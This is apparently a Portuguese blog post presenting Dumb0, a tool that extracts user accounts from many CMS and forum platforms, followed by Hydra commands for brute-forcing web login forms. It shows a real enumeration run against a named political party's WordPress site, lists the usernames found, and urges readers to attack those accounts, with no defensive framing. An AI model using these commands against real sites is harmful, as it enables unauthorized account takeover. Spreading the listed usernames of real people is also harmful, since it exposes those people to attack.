Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.
baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/
CMS que podemos extrair:
SMF -- Simple Machine ForumsUsando:
IPB -- Invision Power Board
XEN -- Xen Foro
VB -- vBulletin
myBB --
useBB --
vanilla --
bbPress --
WP -- WordPress
SPIP -- SPIP CMS
DRUPAL -- Drupal
MOODLE -- Moodle
BEE -- Beehive Forums
FLUX -- fluxBB
FUD -- FUDforum
punBB --
ACM -- AcmImBoard XD
BURN -- Burning Board
COM -- Community Servers
deluxeBB --
fusionBB --
JFORUM --
JITBIT -- Jibit ASPNetForum
JIVE -- Jive Forums
NEAR -- Near Forums
OVBB --
TikiWiki -- TikiWiki CMS-Groupware
Comando Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }
Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:
hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^¶metroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt
Sintaxe simples fica assim :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"
--------------------------------------------------------------------------------
Para criar esta sintaxe foi preciso :
Valor do atributo action do--------------------------------------------------------------------------------
<form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
--------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/
perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'
RESULTADO:
[!] Dumping users from http://www.psdb-mg.org.br/...
[+] Posible user found ~> admin – PSDB - MG
[+] Posible user found ~> psdb – PSDB - MG
[+] Posible user found ~> psdbjovem – PSDB - MG
[+] Posible user found ~> psdbmulher – PSDB - MG
[+] Posible user found ~> psdbsindical – PSDB - MG
[+] Posible user found ~> itv – PSDB - MG
[+] Posible user found ~> Alias – PSDB - MG
[+] Posible user found ~> tucanafro – PSDB - MG
[!] Work finished
Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.
REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/
Este comentário foi removido por um administrador do blog.
ResponderExcluirEste comentário foi removido por um administrador do blog.
ResponderExcluirEste comentário foi removido por um administrador do blog.
ResponderExcluir